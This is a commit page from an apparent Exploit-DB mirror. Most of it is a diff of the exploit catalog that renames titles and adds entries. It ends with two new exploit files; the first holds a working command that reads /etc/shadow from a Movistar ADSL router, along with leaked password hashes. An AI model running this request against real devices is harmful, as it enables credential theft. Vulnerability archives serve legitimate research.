bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-11-09

Browse source 
17 new exploits

DigitalHive 2.0 RC2 - (base_include.php) Remote File Inclusion
DigitalHive 2.0 RC2 - 'base_include.php' Remote File Inclusion

DodosMail 2.0.1 - (dodosmail.php) Remote File Inclusion
DodosMail 2.0.1 - 'dodosmail.php' Remote File Inclusion

DoSePa 1.0.4 - (textview.php) Information Disclosure
DoSePa 1.0.4 - 'textview.php' Information Disclosure

TrueCrypt 4.3 - Privilege Escalation
TrueCrypt 4.3 - 'setuid' Privilege Escalation

w-Agora 4.2.1 - (cat) SQL Injection
w-Agora 4.2.1 - 'cat' Parameter SQL Injection

IPTBB 0.5.4 - (viewdir id) SQL Injection
IPTBB 0.5.4 - 'id' Parameter SQL Injection

LoudBlog 0.6.1 - (parsedpage) Remote Code Execution
LoudBlog 0.6.1 - 'parsedpage' Parameter Remote Code Execution

evilboard 0.1a - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
evilboard 0.1a - SQL Injection / Cross-Site Scripting

QuickTime Player 7.3.1.70 - (rtsp) Buffer Overflow
QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow

DigitalHive 2.0 RC2 - (user_id) SQL Injection
DigitalHive 2.0 RC2 - 'user_id' Parameter SQL Injection

X7 Chat 2.0.5 - 'day' SQL Injection
X7 Chat 2.0.5 - 'day' Parameter SQL Injection

HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos Exploit
HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/DoS

Cisco VPN Client - Integer Overflow (DOS)
Cisco VPN Client - Integer Overflow (DoS)

Multiple WordPress Plugins - timthumb.php File Upload
Multiple WordPress Plugins - 'timthumb.php' File Upload

glibc - LD_AUDIT Arbitrary DSO Load Privilege Escalation
glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation

NetServe FTP Client 1.0 - Local DOS (Overflow)
NetServe FTP Client 1.0 - Local DoS (Overflow)

Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial Of Service (PoC)
Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080 / MS14-084)
Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read
Microsoft Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)
Microsoft Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read
Linux Kernel 2.6.x < 2.6.7-rc3 - 'sys_chown()' Privilege Escalation
Solaris 8/9 ps - Environment Variable Information leak
Solaris 7/8/9 CDE libDtHelp - Buffer Overflow dtprintinfo Privilege Escalation
Solaris 7/8/9 CDE libDtHelp - Buffer Overflow Non-Exec Stack Privilege Escalation
Solaris 8/9 passwd(1) - 'circ()' Stack-Based Buffer Overflow Privilege Escalation
Linux Kernel - TCP Related Read Use-After-Free
WordPress Plugin 'XCloner' 3.1.5 - Multiple Vulnerabilities
WordPress Plugin 404 to 301 2.2.8 - Persistent Cross-Site Scripting
WordPress Plugin WassUp Real Time Analytics 1.9 - Persistent Cross-Site Scripting
MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure
D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure
NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure
NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure
PLANET ADSL Router AND-4101 - Remote File Disclosure
Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)
Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution
This commit is contained in:
Offensive Security 2016-11-09 05:01:25 +00:00
parent 1e08cb156e
commit 490539b3f3
18 changed files with 2145 additions and 18 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

53
files.csv
View file

@ -2262,7 +2262,7 @@ id,file,description,date,author,platform,type,port
2563,platforms/php/webapps/2563.pl,"phpBurningPortal 1.0.1 - (lang_path) Remote File Inclusion",2006-10-15,r0ut3r,php,webapps,0
2564,platforms/php/webapps/2564.pl,"phpBBFM 206-3-3 - 'phpbb_root_path' Remote File Inclusion",2006-10-15,Kamalian,php,webapps,0
2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0
2566,platforms/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - (base_include.php) Remote File Inclusion",2006-10-15,SHiKaA,php,webapps,0
2566,platforms/php/webapps/2566.txt,"DigitalHive 2.0 RC2 - 'base_include.php' Remote File Inclusion",2006-10-15,SHiKaA,php,webapps,0
2567,platforms/php/webapps/2567.txt,"Def-Blog 1.0.3 - (comadd.php) SQL Injection",2006-10-15,SHiKaA,php,webapps,0
2568,platforms/php/webapps/2568.txt,"webSPELL 4.01.01 - (getsquad) SQL Injection",2006-10-15,Kiba,php,webapps,0
2569,platforms/solaris/local/2569.sh,"Solaris 10 (libnspr) - LD_PRELOAD Arbitrary File Creation Privilege Escalation",2006-10-16,"Marco Ivaldi",solaris,local,0
@ -2433,7 +2433,7 @@ id,file,description,date,author,platform,type,port
2739,platforms/php/webapps/2739.txt,"iPrimal Forums - 'admin/index.php' Remote File Inclusion",2006-11-08,Bl0od3r,php,webapps,0
2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 - (cfgProgDir) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0
2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - (inc/irayofuncs.php) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0
2742,platforms/php/webapps/2742.txt,"DodosMail 2.0.1 - (dodosmail.php) Remote File Inclusion",2006-11-08,"Cold Zero",php,webapps,0
2742,platforms/php/webapps/2742.txt,"DodosMail 2.0.1 - 'dodosmail.php' Remote File Inclusion",2006-11-08,"Cold Zero",php,webapps,0
2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (1)",2006-11-08,anonymous,windows,remote,0
2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - (inc/session.php) Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0
2745,platforms/php/webapps/2745.txt,"gtcatalog 0.9.1 - 'index.php' Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0
@ -2485,7 +2485,7 @@ id,file,description,date,author,platform,type,port
2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - (manager/index.php) Local File Inclusion",2006-11-16,Revenge,php,webapps,0
2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0
2794,platforms/php/webapps/2794.txt,"mg.applanix 1.3.1 - (apx_root_path) Remote File Inclusion",2006-11-17,v1per-haCker,php,webapps,0
2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - (textview.php) Information Disclosure",2006-11-17,"Craig Heffner",php,webapps,0
2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - 'textview.php' Information Disclosure",2006-11-17,"Craig Heffner",php,webapps,0
2796,platforms/php/webapps/2796.php,"miniCWB 1.0.0 - (contact.php) Local File Inclusion",2006-11-17,Kacper,php,webapps,0
2797,platforms/php/webapps/2797.txt,"Powies pForum 1.29a - (editpoll.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0
2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 - (matchdetail.php) SQL Injection",2006-11-17,SHiKaA,php,webapps,0
@ -3326,7 +3326,7 @@ id,file,description,date,author,platform,type,port
3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,windows,remote,0
3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0
3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0
3664,platforms/windows/local/3664.txt,"TrueCrypt 4.3 - Privilege Escalation",2007-04-04,"Marco Ivaldi",windows,local,0
3664,platforms/windows/local/3664.txt,"TrueCrypt 4.3 - 'setuid' Privilege Escalation",2007-04-04,"Marco Ivaldi",windows,local,0
3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - mutant_functions.php Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0
3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - (visit.php) SQL Injection",2007-04-04,ajann,php,webapps,0
3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0
@ -4466,11 +4466,11 @@ id,file,description,date,author,platform,type,port
4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS - Arbitrary File Upload / Disclosure",2007-12-30,BugReport.IR,php,webapps,0
4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps,0
4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0
4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - (cat) SQL Injection",2007-12-30,IHTeam,php,webapps,0
4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - 'cat' Parameter SQL Injection",2007-12-30,IHTeam,php,webapps,0
4818,platforms/windows/remote/4818.html,"IBM Domino Web Access 7.0 Upload Module - 'inotes6.dll' Buffer Overflow",2007-12-30,Elazar,windows,remote,0
4819,platforms/windows/remote/4819.html,"Macrovision Installshield - 'isusweb.dll' Overwrite (SEH)",2007-12-30,Elazar,windows,remote,0
4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module - 'dwa7w.dll' Buffer Overflow",2007-12-30,Elazar,windows,remote,0
4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - (viewdir id) SQL Injection",2007-12-31,MhZ91,php,webapps,0
4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - 'id' Parameter SQL Injection",2007-12-31,MhZ91,php,webapps,0
4822,platforms/php/webapps/4822.txt,"MyPHP Forum 3.0 - (Final) Multiple SQL Injection",2007-12-31,x0kster,php,webapps,0
4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - (rss.php albumnr) SQL Injection",2007-12-31,Silentz,php,webapps,0
4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection",2007-12-31,Guga360,asp,webapps,0
@ -4498,7 +4498,7 @@ id,file,description,date,author,platform,type,port
4846,platforms/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0
4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps,0
4848,platforms/asp/webapps/4848.txt,"PortalApp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0
4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - (parsedpage) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0
4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - 'parsedpage' Parameter Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0
4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - 'go.php' Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0
4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - 'html.php' Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0
4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-01-06,"Virangar Security",php,webapps,0
@ -4514,7 +4514,7 @@ id,file,description,date,author,platform,type,port
4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow",2008-01-07,"Thomas Pollet",linux,remote,0
4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0
4864,platforms/php/webapps/4864.txt,"ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
4865,platforms/php/webapps/4865.txt,"evilboard 0.1a - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0
4865,platforms/php/webapps/4865.txt,"evilboard 0.1a - SQL Injection / Cross-Site Scripting",2008-01-08,seaofglass,php,webapps,0
4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow",2008-01-08,ryujin,windows,remote,0
4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - 'id_actividad' Parameter SQL Injection",2008-01-08,ka0x,php,webapps,0
4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overflow",2008-01-08,Elazar,windows,remote,0
@ -4533,9 +4533,9 @@ id,file,description,date,author,platform,type,port
4882,platforms/php/webapps/4882.txt,"MTCMS 2.0 - SQL Injection",2008-01-10,"Virangar Security",php,webapps,0
4883,platforms/php/webapps/4883.txt,"DomPHP 0.81 - 'index.php' Remote File Inclusion",2008-01-10,Houssamix,php,webapps,0
4884,platforms/php/webapps/4884.php,"Evilsentinel 1.0.9 - (Multiple Vulnerabilities) Disable Exploit",2008-01-10,BlackHawk,php,webapps,0
4885,platforms/windows/dos/4885.txt,"QuickTime Player 7.3.1.70 - (rtsp) Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos,0
4885,platforms/windows/dos/4885.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos,0
4886,platforms/php/webapps/4886.pl,"iGaming CMS 1.3.1/1.5 - SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0
4887,platforms/php/webapps/4887.htm,"DigitalHive 2.0 RC2 - (user_id) SQL Injection",2008-01-11,j0j0,php,webapps,0
4887,platforms/php/webapps/4887.htm,"DigitalHive 2.0 RC2 - 'user_id' Parameter SQL Injection",2008-01-11,j0j0,php,webapps,0
4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 - (index.php cat) SQL Injection",2008-01-11,MhZ91,php,webapps,0
4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusion",2008-01-11,k1n9k0ng,php,webapps,0
4890,platforms/php/webapps/4890.txt,"AJchat 0.10 - unset() bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0
@ -4555,7 +4555,7 @@ id,file,description,date,author,platform,type,port
4904,platforms/php/webapps/4904.txt,"Binn SBuilder - 'nid' Parameter Blind SQL Injection",2008-01-13,JosS,php,webapps,0
4905,platforms/php/webapps/4905.pl,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)",2008-01-13,Pr0metheuS,php,webapps,0
4906,platforms/windows/remote/4906.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow (PoC)",2008-01-14,"Luigi Auriemma",windows,remote,0
4907,platforms/php/webapps/4907.py,"X7 Chat 2.0.5 - 'day' SQL Injection",2008-01-14,nonroot,php,webapps,0
4907,platforms/php/webapps/4907.py,"X7 Chat 2.0.5 - 'day' Parameter SQL Injection",2008-01-14,nonroot,php,webapps,0
4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - 'topic' Parameter SQL Injection",2008-01-14,j0j0,php,webapps,0
4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager - Insecure Methods",2008-01-14,Elazar,windows,remote,0
4910,platforms/asp/webapps/4910.pl,"RichStrong CMS - 'cat' Parameter SQL Injection",2008-01-14,JosS,asp,webapps,0
@ -8498,7 +8498,7 @@ id,file,description,date,author,platform,type,port
9002,platforms/windows/remote/9002.c,"Bopup Communications Server 3.2.26.5460 - Remote SYSTEM Exploit",2009-06-22,mu-b,windows,remote,19810
9004,platforms/php/webapps/9004.txt,"Zen Cart 1.3.8 - Remote Code Execution",2009-06-23,BlackH,php,webapps,0
9005,platforms/php/webapps/9005.py,"Zen Cart 1.3.8 - SQL Execution Exploit",2009-06-23,BlackH,php,webapps,0
9006,platforms/windows/dos/9006.py,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos Exploit",2009-06-23,Nibin,windows,dos,0
9006,platforms/windows/dos/9006.py,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/DoS",2009-06-23,Nibin,windows,dos,0
9007,platforms/windows/dos/9007.rb,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos (Metasploit)",2009-06-23,Nibin,windows,dos,0
9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-23,CraCkEr,php,webapps,0
9009,platforms/php/webapps/9009.txt,"BASE 1.2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",php,webapps,0
@ -9505,7 +9505,7 @@ id,file,description,date,author,platform,type,port
10186,platforms/bsd/dos/10186.txt,"K-Meleon 1.5.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0
10187,platforms/bsd/dos/10187.txt,"Opera 10.01 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0
10189,platforms/php/webapps/10189.txt,"Betsy CMS versions 3.5 - Local File Inclusion",2009-11-21,MizoZ,php,webapps,0
10190,platforms/windows/dos/10190.txt,"Cisco VPN Client - Integer Overflow (DOS)",2009-11-21,"Alex Hernandez",windows,dos,0
10190,platforms/windows/dos/10190.txt,"Cisco VPN Client - Integer Overflow (DoS)",2009-11-21,"Alex Hernandez",windows,dos,0
10192,platforms/php/webapps/10192.txt,"Joomla! Component Com_Joomclip - (cat) SQL Injection",2009-11-21,"599eme Man",php,webapps,0
10201,platforms/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0
10202,platforms/linux/dos/10202.c,"Linux Kernel < 2.6.31-rc4 - 'nfs4_proc_lock()' Denial of Service",2009-10-15,"Simon Vallet",linux,dos,0
@ -15537,7 +15537,7 @@ id,file,description,date,author,platform,type,port
17869,platforms/php/webapps/17869.txt,"WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0
17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow",2011-09-19,mr.pr0n,windows,remote,0
17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0
17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugins - timthumb.php File Upload",2011-09-19,"Ben Schmidt",php,webapps,0
17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugins - 'timthumb.php' File Upload",2011-09-19,"Ben Schmidt",php,webapps,0
17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0
17874,platforms/hardware/webapps/17874.txt,"Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0
17876,platforms/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0
@ -15734,7 +15734,7 @@ id,file,description,date,author,platform,type,port
18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0
18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST) (Metasploit)",2011-11-09,Node,windows,remote,0
18108,platforms/php/webapps/18108.rb,"Support Incident Tracker 3.65 - Remote Command Execution (Metasploit)",2011-11-13,Metasploit,php,webapps,0
18105,platforms/linux/local/18105.sh,"glibc - LD_AUDIT Arbitrary DSO Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0
18105,platforms/linux/local/18105.sh,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0
18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 - '.pdf' / '.WWF' File Handling Denial of Service",2011-11-11,LiquidWorm,windows,dos,0
18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - Denial of Service",2011-11-11,swami,windows,dos,0
18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,windows,local,0
@ -34182,7 +34182,7 @@ id,file,description,date,author,platform,type,port
37760,platforms/windows/local/37760.rb,"PDF Shaper 3.5 - Buffer Overflow (Metasploit)",2015-08-12,metacom,windows,local,0
37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0
37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0
37763,platforms/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local DOS (Overflow)",2015-08-12,Un_N0n,windows,dos,0
37763,platforms/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local DoS (Overflow)",2015-08-12,Un_N0n,windows,dos,0
37764,platforms/windows/dos/37764.html,"Microsoft Internet Explorer - CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0
37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0
37766,platforms/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos,0
@ -36792,6 +36792,7 @@ id,file,description,date,author,platform,type,port
40701,platforms/php/webapps/40701.html,"ETchat 3.7 - Cross-Site Request Forgery",2016-11-03,"Hesam Bazvand",php,webapps,0
40705,platforms/php/webapps/40705.html,"sNews 1.7.1 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
40706,platforms/php/webapps/40706.txt,"sNews 1.7.1 - Arbitrary File Upload",2016-11-03,Amir.ght,php,webapps,0
40703,platforms/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial Of Service (PoC)",2016-11-08,"Todor Donev",windows,dos,0
40704,platforms/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow",2016-11-03,Cybernetic,windows,remote,0
40707,platforms/php/webapps/40707.html,"nodCMS - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
40708,platforms/php/webapps/40708.html,"Redaxo 5.2.0 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
@ -36803,8 +36804,24 @@ id,file,description,date,author,platform,type,port
40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0
40719,platforms/php/webapps/40719.txt,"Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection",2016-11-07,Vulnerability-Lab,php,webapps,0
40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0
40721,platforms/windows/remote/40721.html,"Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080 / MS14-084)",2016-11-07,Skylined,windows,remote,0
40722,platforms/windows/dos/40722.html,"Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0
40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8-11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0
40722,platforms/windows/dos/40722.html,"Microsoft Internet Explorer 9 MSHTML - CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0
40723,platforms/php/webapps/40723.txt,"NodCMS - PHP Code Execution",2016-11-07,"Ashiyane Digital Security Team",php,webapps,0
40724,platforms/php/webapps/40724.txt,"Piwik 2.16.0 - 'layout' PHP Object Injection",2016-11-07,"Egidio Romano",php,webapps,80
40725,platforms/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,php,webapps,0
40726,platforms/linux/local/40726.c,"Linux Kernel 2.6.x < 2.6.7-rc3 - 'sys_chown()' Privilege Escalation",2004-12-04,"Marco Ivaldi",linux,local,0
40727,platforms/solaris/local/40727.sh,"Solaris 8/9 ps - Environment Variable Information leak",2006-07-26,"Marco Ivaldi",solaris,local,0
40728,platforms/solaris/local/40728.c,"Solaris 7/8/9 CDE libDtHelp - Buffer Overflow dtprintinfo Privilege Escalation",2004-12-04,"Marco Ivaldi",solaris,local,0
40729,platforms/solaris/local/40729.c,"Solaris 7/8/9 CDE libDtHelp - Buffer Overflow Non-Exec Stack Privilege Escalation",2004-12-04,"Marco Ivaldi",solaris,local,0
40730,platforms/solaris/local/40730.c,"Solaris 8/9 passwd(1) - 'circ()' Stack-Based Buffer Overflow Privilege Escalation",2004-12-04,"Marco Ivaldi",solaris,local,0
40731,platforms/linux/dos/40731.c,"Linux Kernel - TCP Related Read Use-After-Free",2016-08-18,"Marco Grassi",linux,dos,0
40739,platforms/php/webapps/40739.txt,"WordPress Plugin 'XCloner' 3.1.5 - Multiple Vulnerabilities",2016-11-08,"Felipe Molina",php,webapps,0
40732,platforms/php/webapps/40732.txt,"WordPress Plugin 404 to 301 2.2.8 - Persistent Cross-Site Scripting",2016-11-08,"Alyssa Milburn",php,webapps,80
40733,platforms/php/webapps/40733.txt,"WordPress Plugin WassUp Real Time Analytics 1.9 - Persistent Cross-Site Scripting",2016-11-08,"Burak Kelebek",php,webapps,80
40734,platforms/hardware/remote/40734.sh,"MOVISTAR ADSL Router BHS_RTA - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40735,platforms/hardware/remote/40735.txt,"D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40736,platforms/hardware/remote/40736.txt,"NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40737,platforms/hardware/remote/40737.sh,"NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40738,platforms/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",hardware,remote,0
40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547
40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0

Can't render this file because it is too large.

40
platforms/hardware/remote/40734.sh Executable file
View file

@ -0,0 +1,40 @@
#!/bin/sh
#
# MOVISTAR ADSL ROUTER BHS_RTA BHS_RTA_C0_019
# Remote File Disclosure
#
# Vendor: OBSERVA
# Model: BHS_RTA
# Software: BHS_RTA_CO_019
# Firmware: 09/08/2012-10:23:25
#
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
[todor@adamantium ~]$ torsocks GET "http://TARGET/cgi-bin/webproc?getpage=/etc/shadow&var:language=es_es&var:page="
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

39
platforms/hardware/remote/40735.txt Executable file
View file

@ -0,0 +1,39 @@
#!/bin/sh
#
# D-Link ADSL ROUTER DSL-2730U IN_1.02
# Remote File Disclosure
#
# Modem Name: DSL-2730U/DSL-2750E
# Time and Date: 2012-05-23 09:51:16
# HardwareVersion: U1
# Firmware Version: IN_1.02/SEA_1.04/SEA_1.07
#
# Copyright 2016 (c) Todor Donev
